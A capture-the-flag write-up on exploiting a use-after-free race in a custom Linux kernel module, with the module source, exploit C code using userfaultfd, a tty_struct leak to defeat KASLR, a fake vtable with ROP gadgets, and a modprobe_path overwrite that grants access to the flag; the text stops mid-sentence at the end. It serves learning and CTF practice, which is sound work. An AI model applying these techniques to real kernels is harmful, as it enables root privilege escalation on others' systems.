Exploit linux kernel use after free with a race condition.

Description

Store your books safely inside the kernel!

nc klibrary.2021.3k.ctf.to 9994

Setup

You can find the files and the readme here https://github.com/meowmeowxw/kernel-exploits/tree/main/ctf/3k-2021-klibrary

This is a linux kernel pwn challenge. We have:

  1. bzImage -> This is the linux kernel image
  2. initramfs.cpio -> This is the compressed file system
  3. src/library.c -> This is the source code of the custom kernel module
  4. start.sh -> This is the qemu script to run the kernel image

To extract the filesystem use:

mkdir initramfs
cd initramfs
cpio -i < ../initramfs.cpio

Inside we can find the init file and the custom kernel module library.ko.

To compress the filesystem with cpio:

cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../

To start the os as root you need to edit initramfs/init:

setsid cttyhack setuidgid 0 sh
# setsid cttyhack setuidgid 1000 sh

I modified the start.sh to compile my exploit, compress the filesystem, disable kaslr and start qemu in debug mode:

#!/bin/sh

gcc -g -static ./exploit.c -o ./initramfs/exploit -lpthread -no-pie

cd ./initramfs
find . | cpio -o -H newc > ../initramfs1.cpio
cd ../

exec qemu-system-x86_64 \
    -m 128M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
    -no-reboot \
    -cpu qemu64,+smep,+smap \
    -monitor /dev/null \
    -initrd "./initramfs1.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1 \
    -s

The active kernel protections are:

  1. KASLR -> We need a leak
  2. SMEP -> You can’t execute shellcode in user-space when the cpu is in kernel mode/ring 0
  3. SMAP -> You can’t access page in user-space when the cpu is in kernel mode (it’s harder to rop)
  4. KPTI -> Separate kernel-space from user-space page tables

You can extract the bzImage with https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux. After that I use https://github.com/marin-m/vmlinux-to-elf to export the symbols inside the kernel’s elf image to use during debugging.

Analysis

library.c:

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>

#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300

#define CMD_ADD			0x3000
#define CMD_REMOVE		0x3001
#define CMD_REMOVE_ALL	0x3002
#define CMD_ADD_DESC	0x3003
#define CMD_GET_DESC 	0x3004

static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);

MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");

static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp); 
static int library_release(struct inode* inode, struct file *filp); 

static struct file_operations library_fops = {
	.owner = 			THIS_MODULE,
	.unlocked_ioctl = 	library_ioctl,
	.open = 			library_open,
	.release = 			library_release
};

static struct class* library_class = NULL;
static struct device* library_device = NULL;

struct Book {
	char book_description[BOOK_DESCRIPTION_SIZE];
	unsigned long index;
	struct Book* next;
	struct Book* prev;
} *root;

struct Request {
	unsigned long index;
	char __user * userland_pointer;
};

unsigned long counter = 1;

static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);

static int library_open(struct inode* inode, struct file *filp) {
	
	printk(KERN_INFO "[library] : manage your books safely here!\n");
	return 0;
}


static int library_release(struct inode* inode, struct file *filp) {
	printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");
	remove_all();
	return 0;
}

static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
	struct Request request;
	
	if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
		return -1;
	}
		
	if(cmd == CMD_REMOVE_ALL) {
		mutex_lock(&remove_all_lock);
		remove_all();
		mutex_unlock(&remove_all_lock);	
	} else {
		mutex_lock(&ioctl_lock);

		switch(cmd) {
				case CMD_ADD:
						add_book(request.index);
						break;
				case CMD_REMOVE:
						remove_book(request.index);
						break;
				case CMD_ADD_DESC:
						add_description_to_book(request);
						break;
				case CMD_GET_DESC:
						get_book_description(request);
						break;
		}

		mutex_unlock(&ioctl_lock);
	}
	return 0;

}

static int add_book(unsigned long index) {
	
	if(counter >= 10) {
		printk(KERN_INFO "[library] can only hold 10 books here\n");
		return -1;
	}

	struct Book *b, *p;
	b = (struct Book*)kzalloc(sizeof(struct Book), GFP_KERNEL);
	
	if(b == NULL) {
		printk(KERN_INFO "[library] : allocation failed! \n");
		return -1;
	}

	b->index = index;
	if(root == NULL) {
		root = b;
		root->prev = NULL;
		root->next = NULL;
	} else {
		p = root;
		while(p->next != NULL)
			p = p->next;
		p->next = b;
		b->prev = p;
		b->next = NULL;
	}

	counter++;

	return 0;
}

static int remove_book(unsigned long index) {
	struct Book *p, *prev, *next;
	if(root == NULL) {
		printk(KERN_INFO "[library] : no books in the library yet.");
		return -1;
	} 
	else if (root->index == index) {
		p = root;
		root = root->next;
		kfree(p);
	}
	else {
		p = root;
		while(p != NULL && p->index != index)
			p = p->next;
		
		if(p == NULL) {
			printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
		}

		prev = p->prev;
		next = p->next;
		prev->next = next;
		next->prev = prev;
		
		kfree(p);
	}

	counter--;

	return 0;
}

static noinline int remove_all(void) {
	struct Book *b, *p;
	b = root;
	
	while(b != NULL) {
		p = b->next;
		kfree(b);
		b = p;
	}
	
	root = NULL;
	counter = 1;
	return 0;
}

static int add_description_to_book(struct Request request) {
	struct Book* book = root;

	if(book == NULL){
		printk(KERN_INFO "[library] : no books in the library yet.\n");
		return -1;
	}
	

	for(; book != NULL && book->index != request.index; book = book->next);

	if(book == NULL) {
		printk(KERN_INFO "[library] : the given index wasn't found\n");
		return -1;
	}

	if(copy_from_user((void*)book->book_description,
					  (void*)(request.userland_pointer),
					  BOOK_DESCRIPTION_SIZE)) {
		printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
		return -1;
	}
}

static int get_book_description(struct Request request) {
	struct Book* book;
	book = root;

	if(book == NULL) {
		printk("[library] : no books yet, can not read the description.\n");
		return -1;
	}

	while(book != NULL && book->index != request.index)
		book = book->next;

	if(book == NULL) {
		printk(KERN_INFO "[library] : no book with the index you provided\n");
		return -1;
	}

	if(copy_to_user((void*)request.userland_pointer,
					(void*)book->book_description,
					BOOK_DESCRIPTION_SIZE)) {
		printk("[library] : copy_to_user failed!\n");
		return -1;
	}
}

static int __init init_library(void) {
	major = register_chrdev(0, DEVICE_NAME, &library_fops);

	if(major < 0) {
		return -1;
	}

	library_class = class_create(THIS_MODULE, CLASS_NAME);
	if(IS_ERR(library_class)) {
		unregister_chrdev(major, DEVICE_NAME);
		return -1;
	}

	library_device = device_create(library_class, 
					0, 
					MKDEV(major, 0),
				   	0, 
					DEVICE_NAME);

	if(IS_ERR(library_device)) {
		class_destroy(library_class);
		unregister_chrdev(major, DEVICE_NAME);
		return -1;
	}

	root = NULL;
	mutex_init(&ioctl_lock);
	mutex_init(&remove_all_lock);
	printk(KERN_INFO "[library] : started!\n");
	return 0;
}

static void __exit exit_library(void) {
	
	device_destroy(library_class, MKDEV(major, 0));
	class_unregister(library_class);
	class_destroy(library_class);
	unregister_chrdev(major, DEVICE_NAME);

	mutex_destroy(&ioctl_lock);
	mutex_destroy(&remove_all_lock);
	printk(KERN_INFO "[library] : finished!\n");
}

module_init(init_library);
module_exit(exit_library);

To communicate with the kernel module we need to use ioctl. The module has a double linked list called root:

struct Book {
	char book_description[BOOK_DESCRIPTION_SIZE];
	unsigned long index;
	struct Book* next;
	struct Book* prev;
} *root;

We can interact with the module with 5 commands:

  1. CMD_ADD(index) -> add book to the list and set the specified index
  2. CMD_REMOVE(index) -> remove book from the list
  3. CMD_ADD_DESC(index, buffer) -> copy userspace buffer inside book_description
  4. CMD_GET_DESC(index, buffer) -> copy to userspace buffer the content of book_description
  5. CMD_REMOVE_ALL() -> kfree all the book

We can have 10 books inside the list.

Vulnerability

if(cmd == CMD_REMOVE_ALL) {
    mutex_lock(&remove_all_lock);
    remove_all();
    mutex_unlock(&remove_all_lock);	
} else {
    mutex_lock(&ioctl_lock);

    switch(cmd) {
            case CMD_ADD:
                    add_book(request.index);
                    break;
            case CMD_REMOVE:
                    remove_book(request.index);
                    break;
            case CMD_ADD_DESC:
                    add_description_to_book(request);
                    break;
            case CMD_GET_DESC:
                    get_book_description(request);
                    break;
    }

    mutex_unlock(&ioctl_lock);
}

The vulnerability is easy to spot if you’re familiar with this kind of challenge. The module uses two separate mutex_lock to handle commands, so we can trigger a race condition:

  1. one thread add the description and another does the kfree of the list -> Use-After-Free (write)
  2. one thread get the description and another does the kfree of the list -> Use-After-Free (read)

SLUB Intro

SLUB is the default allocator of the linux kernel, of course it’s not easy to understand the inner workings but there are some nice introductions on the internet:

  1. https://github.com/PaoloMonti42/salt/blob/master/docs/0x00_SLUB_refresher.md
  2. https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html
  3. https://hammertux.github.io/slab-allocator
  4. Read the source code 😎

To make things simple there are different freelist of free objects of different sizes and there are specific list to contain only specifc objects (ex. task_struct of every process). You can find the freelist with: cat /proc/slabinfo The freelist are simple linked-list with the next pointer that points to next free object. On the implementation of SLUB there are two protections that luckily for us weren’t enabled on this challenge(in reality only one would have been a bit tedious):

  1. CONFIG_SLAB_FREELIST_HARDENED -> encrypt the next pointer with: xor of a random value xor address of the pointer bswapped (swap endianess, in a way similar to glibc 2.32 ptr protection)
  2. CONFIG_SLAB_FREELIST_RANDOM -> randomize the order of the freelist, by default the freed objects available are “ordered” from the lowest to highest address

Since our book struct occupies 0x318=792 bytes the kernel will get a freed object from a kmalloc-1024 list.

Race condition

Spawning two threads that tries to trigger the race condition it’s not optimal, we have low probability of success. Luckily for us exists userfaultfd that can be used to register the routine to handle a page fault in userspace:

https://blog.lizzie.io/using-userfaultfd.html

With this technique we can arbitrarily stop kernel code execution when the kernel tries to execute copy_from_user(dest, uf_page, ...) or copy_to_user(uf_page, src, ...) where uf_page is a mmaped address in user space registered with userfaultfd by us.

So we can effectively stop during add_description_to_book and get_book_description to execute remove_all and trigger the UAF.

Writeup

1st stage

The first thing we have to do is to leak addresses to defeat KASLR. In linux kernel heap exploitation there are various techniques, the most used is to use some syscall to tell the kernel to allocate indirectly some structs, if we have a UAF we can then read/write to this struct to get an arb read/write or rip control.

  1. I free a book in address 0xaa00
  2. syscall(something) -> trigger kmalloc -> return 0xaa00

For a list of useful structs:

  1. https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
  2. www.personal.psu.edu/yxc431/publications/SLAKE.pdf

For kmalloc-1024 the most used structure is tty_struct that we can use to achieve arbitrary read/write and RIP control. To allocate the structure we just need to execute ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);

The strategy is to:

Thread 1 Thread 2
allocate a book 0 idle
register ufd to address XYZ idle
get_book_description(dest=XYZ) –> STOP execution here page fault
idle remove_all
idle open("/dev/ptmx”)
idle return
finish copy_to_user with leaked tty_struct ended
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/resource.h>
#include <pthread.h>
#include <sys/mman.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>

#define DEVICE_NAME "/dev/library"

#define BOOK_DESCRIPTION_SIZE 0x300

#define CMD_ADD			0x3000
#define CMD_REMOVE		0x3001
#define CMD_REMOVE_ALL	0x3002
#define CMD_ADD_DESC	0x3003
#define CMD_GET_DESC 	0x3004

#define PAGESIZE 0x1000

int ioctl_add(uint64_t id);
int ioctl_remove(uint64_t id);
int ioctl_add_desc(uint64_t id, uint8_t *buffer);
int ioctl_get_desc(uint64_t id, uint8_t *buffer);
int _ioctl_get_desc(uint64_t id, uint8_t *buffer);
int ioctl_remove_all();
void leak_heap();
void write_next_ptr();
void *race_userfault(void (*func)());
int userfaultfd(int flags);
int register_ufd(uint64_t page);
void print_leak(uint64_t *ptr, int size);
void get_rax();

typedef struct {
    uint64_t index;
    uint8_t *ptr;
} request_t;

typedef struct {
    uint64_t index;
    void *next;
    void *prev;
} book_details;

uint64_t kbase = 0x0L,
         heap_ptr = 0x0L;

int fd, ufd, ret, ptmx;
uint64_t uf_page, rax = 0, leak[BOOK_DESCRIPTION_SIZE];
const char cat[] = {0xf0, 0x9f, 0x90, 0x88, '\0'};
const char shark[] = {0xF0, 0x9F, 0xA6, 0x88, '\0'};
const char dice[] = {0xF0, 0x9F, 0x8E, 0xB2, '\0'};
const char alien[] = {0xF0, 0x9F, 0x91, 0xBE, '\0'};
const char ghost[] = {0xF0, 0x9F, 0x91, 0xBB, '\0'};

int main(int argc, char **argv) {
    uint8_t *buf = calloc(BOOK_DESCRIPTION_SIZE, 1);
    pthread_t th;

    fd = open(DEVICE_NAME, O_RDONLY);
    printf("[%s] fd: %d\n", alien, fd);

    ioctl_add(0);

    // 1st stage: LEAK KBASE AND KHEAP
    ufd = register_ufd(0xaaa000);
    printf("[%s] registered ufd: %d\t @ 0x%lx\n", shark, ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, leak_heap);
    _ioctl_get_desc(0, (uint8_t *)0xaaa000);

    kbase = leak[66] - 0x14fc00;
    heap_ptr = leak[8] - 0x38;

    printf("\n");
    printf("[%s] kbase:             0x%016lx\n", ghost, kbase);

    close(ptmx);
    return 0;
}

int ioctl_add(uint64_t id) {
    request_t arg = {
        .index = id,
        .ptr = NULL
    };
    printf("[*] ioctl_add[%ld]\n", id);
    ret = ioctl(fd, CMD_ADD, &arg);
    if (ret != 0) {
        printf("[!] ioctl_add   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

int ioctl_remove(uint64_t id) {
    request_t arg = {
        .index = id,
        .ptr = NULL
    };
    printf("[*] ioctl_remove[%ld]\n", id);
    ret = ioctl(fd, CMD_REMOVE, &id);
    if (ret != 0) {
        printf("[!] ioctl_remove   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

int ioctl_add_desc(uint64_t id, uint8_t *buffer) {
    request_t arg = {
        .index = id,
        .ptr = buffer
    };
    printf("[*] ioctl_add_desc[%ld]\n", id);
    ret = ioctl(fd, CMD_ADD_DESC, &arg);
    if (ret != 0) {
        printf("[!] ioctl_add_desc   ret: %d\t id: %ld\n", ret, id);
    }
    return 0;
}

int ioctl_get_desc(uint64_t id, uint8_t *buffer) {
    memset(buffer, 0, BOOK_DESCRIPTION_SIZE);
    return _ioctl_get_desc(id, buffer);
}

int _ioctl_get_desc(uint64_t id, uint8_t *buffer) {
    request_t arg = {
        .index = id,
        .ptr = buffer
    };
    printf("[*] ioctl_get_desc[%ld]\n", id);
    ret = ioctl(fd, CMD_GET_DESC, &arg);
    if (ret != 0) {
        printf("[!] ioctl_get_desc   ret: %d\t id: %ld\n", ret, id);
    }
    memcpy(leak, buffer, BOOK_DESCRIPTION_SIZE);
    print_leak((uint64_t *)buffer, BOOK_DESCRIPTION_SIZE);
    return 0;
}

int ioctl_remove_all() {
    request_t arg = {
        .index = 0xffffff,
        .ptr = NULL
    };
    printf("[*] ioctl_remove_all\n");
    ret = ioctl(fd, CMD_REMOVE_ALL, &arg);
    if (ret != 0) {
        printf("[!] ioctl_remove_all ret: %d\n", ret);
    }
    return 0;
}

void print_leak(uint64_t *ptr, int size) {
    for (int i = 0; i < size / 8; i++) {
        printf("0x%016lx\t", ptr[i]);
        if (!((i + 1) % 4)) {
            printf("\n");
        }
    }
    printf("\n");
}

int register_ufd(uint64_t page) {
    int fd = 0;
    int memsize = 0x1000;
    uf_page = page;
    struct uffdio_api api = { .api = UFFD_API };

    uf_page = (uint64_t)mmap((void *)uf_page, 0x2000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
    if ((void *)uf_page == MAP_FAILED) {
        perror("mmap uf_page");
        exit(2);
    }

    if ((fd = userfaultfd(O_NONBLOCK)) == -1) {
        fprintf(stderr, "++ userfaultfd failed: %m\n");
        exit(-1);
    }

    if (ioctl(fd, UFFDIO_API, &api)) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_API, ...) failed: %m\n");
        exit(-1);
    }
    if (api.api != UFFD_API) {
        fprintf(stderr, "++ unexepcted UFFD api version.\n");
        exit(-1);
    }

    /* mmap some pages, set them up with the userfaultfd. */
    struct uffdio_register reg = {
        .mode = UFFDIO_REGISTER_MODE_MISSING,
        .range = {
            .start = uf_page,
            .len = memsize
        }
    };

    if (ioctl(fd, UFFDIO_REGISTER,  &reg) == -1) {
        fprintf(stderr, "++ ioctl(fd, UFFDIO_REGISTER, ...) failed: %m\n");
        exit(-1);
    }

    return fd;
}

void *race_userfault(void (*func)()) {
    char uf_buffer[0x1000];
    struct pollfd evt = { .fd = ufd, .events = POLLIN };

    while (poll(&evt, 1, -1) > 0) {
        /* unexpected poll events */
        if (evt.revents & POLLERR) {
            perror("poll");
            exit(-1);
        } else if (evt.revents & POLLHUP) {
            perror("pollhup");
            exit(-1);
        }
        struct uffd_msg fault_msg = {0};
        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg)) {
            perror("read");
            exit(-1);
        }
        char *place = (char *)fault_msg.arg.pagefault.address;
        if (fault_msg.event != UFFD_EVENT_PAGEFAULT
                || (place != (void *)uf_page && place != (void *)uf_page + PAGESIZE)) {
            fprintf(stderr, "unexpected pagefault?.\n");
            exit(-1);
        }
        if (place == (void *)uf_page) {
            printf("[%s] got page fault at address %p, nice!\n", cat, place);
            printf("[%s] call whatever I want\n", cat);
            func();
            printf("[%s] done! now releasing ufd to finish exit\n", cat);

            /* release by copying some data to faulting address */
            struct uffdio_copy copy = {
                .dst = (long) place,
                .src = (long) uf_buffer,
                .len = PAGESIZE
            };
            if (ioctl(ufd, UFFDIO_COPY, &copy) < 0) {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }
            break;
        }
    }
    close(ufd);
    return NULL;
}

int userfaultfd(int flags) {
    return syscall(SYS_userfaultfd, flags);
}

void leak_heap() {
    ioctl_remove_all();
    ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);
}

Output:

[👾] fd: 3
[*] ioctl_add[0]
[🦈] registered ufd: 4   @ 0xaaa000
[*] ioctl_get_desc[0]
[🐈] got page fault at address 0xaaa000, nice!
[🐈] call whatever I want
[*] ioctl_remove_all
[🐈] done! now releasing ufd to finish exit
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0xffff8880070d2038
0xffff8880070d2038      0xffff8880070d2048
0xffff8880070d2048      0xffff88800004e260
0x0000000000000000      0xffff8880070d2068
0xffff8880070d2068      0x0000000000000000
0xffff8880070d2080      0xffff8880070d2080
0x0000000000000000      0xffff8880070d2098
0xffff8880070d2098      0x0000000000000000
0x0000000000000000      0xffff8880070d20b8
0xffff8880070d20b8      0x0000000000000000
0xffff8880070d20d0      0xffff8880070d20d0
0x0000000000000000      0x00000000000000bf
0x010004157f1c0300      0x170f12001a131100
0x0000960000000016      0x0000000000009600
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x00000000306d7470      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000010801      0x0000000000000001
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0xffff8880070d2400
0x0000000000000000      0xffff8880070d21d8
0xffff8880070d21d8      0xffff8880070d21e8
0xffff8880070d21e8      0x0000000fffffffe0
0xffff8880070d2200      0xffff8880070d2200
0xffffffff8114fc00      0xffffc90000091000
0xffff8880001658c0      0xffff88800003eb30
0xffff88800003eb30      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000fffffffe0      0xffff8880070d2258
0xffff8880070d2258      0xffffffff8114ec30
0xffff88800709c600      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000
0x0000000000000000      0x0000000000000000

[👻] kbase:             0xffffffff81000000
[👾] heap_ptr:          0xffff8880070d2000

For some reasons I don’t get the firsts 0x30 bytes of the tty_struct. For example at +0x18 there is the pointer to the virtual table used by the tty. To get the various offset of a struct I use pahole (sometimes however the offset depend on the compilations flag etc). Example:

$ pahole -E tty_struct
struct tty_struct {
        int                        magic;                                                /*     0     4 */
        struct kref {
                /* typedef refcount_t */ struct refcount_struct {
                        /* typedef atomic_t */ struct {
                                int counter;                                             /*     4     4 */
                        } refs; /*     4     4 */
                } refcount; /*     4     4 */
        } kref; /*     4     4 */
        struct device *            dev;                                                  /*     8     8 */
        struct tty_driver *        driver;                                               /*    16     8 */
        const struct tty_operations  * ops;                                              /*    24     8 */
        int                        index;                                                /*    32     4 */

        /* XXX 4 bytes hole, try to pack */

        struct ld_semaphore {
                /* typedef atomic_long_t -> atomic64_t */ struct {
                        /* typedef s64 -> __s64 */ long long int counter;                /*    40     8 */

                        ...

        struct list_head {
                        struct list_head * next;                                         /*    56     8 */
                        /* --- cacheline 1 boundary (64 bytes) --- */
                        struct list_head * prev;                                         /*    64     8 */
                } read_wait; /*    56    16 */
                struct list_head {
                        struct list_head * next;                                         /*    72     8 */
                        struct list_head * prev;                                         /*    80     8 */
...

Anyway, at offset 56/64 there is the prev and next that points to the address of the next tty, but since they’re not allocated we have the address of the pointer itself. If we substract 0x38 we get the address of the tty. At offset 66*8 we have instead a kernel leak, we just need to substract a fixed offset to get the kernel base (verify with grep startup_64 /proc/kallsyms).

2nd stage

I want to know what is the next available objects, so I redo the UAF in read, but I don’t open("/dev/ptmx")

    // 2nd stage: LEAK NEXT PTR
    ioctl_add(0);

    ufd = register_ufd(0xbbb000);
    printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
    _ioctl_get_desc(0, (uint8_t *)0xbbb000);
    next_ptr = leak[512 / 8];

Usually you find the next_ptr in the first 8 bytes of an address, but this time they’re in the middle of the chunk (1024/2).

I always get as next_ptr = heap_ptr + 1024. So this step is skippable but maybe in irl (non-qemu) it makes sense.

3rd stage

The best scenario is to be able to read/write inside the tty_struct, so we need to have a stable UAF (not one that can only be used during race condition). To do that I used this approach:

Basically I wanted that book1 was at address &book0 + 32

Why ?

Because in this way after a remove(1); open("/dev/ptmx") with:

  • get_book_description(0) I can read the tty_struct
  • add_description_to_book(0) I can overwrite the tty_struct

The +32 is needed to not overwrite the index, next, prev of book0, otherwise we couldn’t access book0 if we overwrite book0 with book1.

We also need luck and hope that tty_struct doesn’t overwrite the index of book0 or we can’t access book0 anymore (spoiler: we have luck)

    // 3rd stage overwrite next ptr
    ioctl_add(0);
    ufd = register_ufd(0xccc000);
    printf("registered ufd: %d\t 0x%lx\n", ufd, uf_page);
    pthread_create(&th, NULL, (void *)race_userfault, ioctl_remove_all);
    ((uint64_t *)(uf_page + 0xf00))[512/8] = heap_ptr + 32;
    ioctl_add_desc(0, (uint8_t *)0xcccf00);

    ioctl_add(0);
    memset(buf, 0, BOOK_DESCRIPTION_SIZE);
    ((uint64_t *)(buf + 32))[512/8] = next_ptr;
    ioctl_add_desc(0, buf);

An additional step that I do after overwrite the first next_ptr is that I also fix the next_ptr after that to point to the original next_ptr (that will become book2).

A bug that it took me some time to fix was that I was trying to write inside uf_page the heap_ptr + 32, however it triggered the pagefault in user-space. To bypass that I mmaped uf_page with size 0x2000 bytes and registered the pagefault in the first 0x1000 bytes. In this way I can write inside uf_page + 0xf00 + 0x200 the heap_ptr + 32 (without problems), and pass as ptr to add_desc 0xcccf00 that triggers the right pagefault in the kernel.

4th stage

tty_operations is the virtual table used by the tty, since SMAP is active we can’t craft a fake vtable in user-space. However we can forge a fake vtable inside book2 since we have its address.

struct tty_operations {
        struct tty_struct *        (*lookup)(struct tty_driver *, struct file *, int);   /*     0     8 */
        int                        (*install)(struct tty_driver *, struct tty_struct *); /*     8     8 */
        void                       (*remove)(struct tty_driver *, struct tty_struct *);  /*    16     8 */
        int                        (*open)(struct tty_struct *, struct file *);          /*    24     8 */
        void                       (*close)(struct tty_struct *, struct file *);         /*    32     8 */
        void                       (*shutdown)(struct tty_struct *);                     /*    40     8 */
        void                       (*cleanup)(struct tty_struct *);                      /*    48     8 */
        int                        (*write)(struct tty_struct *, const unsigned char  *, int); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        int                        (*put_char)(struct tty_struct *, unsigned char);      /*    64     8 */
        void                       (*flush_chars)(struct tty_struct *);                  /*    72     8 */
        int                        (*write_room)(struct tty_struct *);                   /*    80     8 */
        int                        (*chars_in_buffer)(struct tty_struct *);              /*    88     8 */
        int                        (*ioctl)(struct tty_struct *, unsigned int, long unsigned int); /*    96     8 */
        long int                   (*compat_ioctl)(struct tty_struct *, unsigned int, long unsigned int); /*   104     8 */
        void                       (*set_termios)(struct tty_struct *, struct ktermios *); /*   112     8 */
        void                       (*throttle)(struct tty_struct *);                     /*   120     8 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        void                       (*unthrottle)(struct tty_struct *);                   /*   128     8 */
        void                       (*stop)(struct tty_struct *);                         /*   136     8 */
        void                       (*start)(struct tty_struct *);                        /*   144     8 */
        void                       (*hangup)(struct tty_struct *);                       /*   152     8 */
        int                        (*break_ctl)(struct tty_struct *, int);               /*   160     8 */
        void                       (*flush_buffer)(struct tty_struct *);                 /*   168     8 */
        void                       (*set_ldisc)(struct tty_struct *);                    /*   176     8 */
        void                       (*wait_until_sent)(struct tty_struct *, int);         /*   184     8 */
        /* --- cacheline 3 boundary (192 bytes) --- */
        void                       (*send_xchar)(struct tty_struct *, char);             /*   192     8 */
        int                        (*tiocmget)(struct tty_struct *);                     /*   200     8 */
        int                        (*tiocmset)(struct tty_struct *, unsigned int, unsigned int); /*   208     8 */
        int                        (*resize)(struct tty_struct *, struct winsize *);     /*   216     8 */
        int                        (*get_icount)(struct tty_struct *, struct serial_icounter_struct *); /*   224     8 */
        int                        (*get_serial)(struct tty_struct *, struct serial_struct *); /*   232     8 */
        int                        (*set_serial)(struct tty_struct *, struct serial_struct *); /*   240     8 */
        void                       (*show_fdinfo)(struct tty_struct *, struct seq_file *); /*   248     8 */
        /* --- cacheline 4 boundary (256 bytes) --- */
        int                        (*proc_show)(struct seq_file *, void *);              /*   256     8 */

        /* size: 264, cachelines: 5, members: 33 */
        /* last cacheline: 8 bytes */
};

There are some functions where we can control the parameters from user-space, for example with ioctl we control esi and rdx. Basically our syscall ioctl(ptmx, esi, rdx) will become ioctl(&tty_struct, esi, rdx). I tried with write but it doesn’t seems controllable with parameters passed from the write in user-space (Maybe I was doing something wrong). We can overwrite the address of tty_driver inside the struct and try to call remove, install, lookup to control rdi but I didn’t try.

I found https://pr0cf5.github.io/ctf/2020/03/09/the-plight-of-tty-in-the-linux-kernel.html that gives some tips on what gadgets are useful.

I found with ROPgadget:

103448:0xffffffff8113e9b1 : mov dword ptr [rdx], esi ; ret // WRITE
122013:0xffffffff81034e74 : mov rax, qword ptr [rsi] ; ret // READ

I opted to overwrite modprobe_path to read the flag. Another strategy was to use read the list of task_struct until I found my process and then with the write primitive overwrite the uid=0. However I needed to get the right offset (it depends on kernel version and compilation flags) and modprobe_path was easier.

So my plan was the following (in red the tty_struct):

    // 4th stage write on modprobe_path
    ioctl_add(1);
    ioctl_add(2);

    ((uint64_t *)buf)[32 / 8] = dummy_ret; // cleanup functions
    ((uint64_t *)buf)[40 / 8] = dummy_ret;
    ((uint64_t *)buf)[48 / 8] = dummy_ret;
    ((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // ioctl function -> arb write gadget
    ioctl_add_desc(2, buf);
    ioctl_get_desc(2, buf);

    // This part is not needed
    book_details b = {
        .index = 0,
        .next = (void *)(heap_ptr + 32),
        .prev = NULL,
    };
    memcpy(buf + BOOK_DESCRIPTION_SIZE - 0x20, &b, 0x18);
    print_leak((uint64_t *)buf, BOOK_DESCRIPTION_SIZE);
    ioctl_add_desc(1, buf);

Then:

    ioctl_remove(1);

    ptmx = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    ioctl_get_desc(0, buf);

    memset(buf, 0, BOOK_DESCRIPTION_SIZE);
    memcpy(buf, leak, BOOK_DESCRIPTION_SIZE);
    ((uint64_t *)buf)[7] = next_ptr; // overwrite pointer to vtable
    ioctl_add_desc(0, buf);

    ioctl(ptmx, *(int *)new_modprobe_path, modprobe_path); // trigger ioctl call inside vtable
    ioctl(ptmx, *(int *)(new_modprobe_path + 4), modprobe_path + 4);
    ioctl(ptmx, *(int *)(new_modprobe_path + 8), modprobe_path + 8);

    system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/bho");
    system("chmod +x /home/ctf/bho");
    system("echo -ne '#!/bin/sh\nchmod 777 /flag.txt' > /home/ctf/a\n");
    system("chmod +x /home/ctf/a");
    system("/home/ctf/bho");

Exploit

exploit

To upload the exploit on the server I recommend to compile with musl-gcc:

musl-gcc exploit.c -o /tmp/exploit -static -lpthread

For arch linux download:

yay -S musl kernel-headers-musl

Flag

3k{SM4P_4LWAYS_MAKES_1T_D1FFICULT_BUT_N0T_IMP0SSIBLE}

But

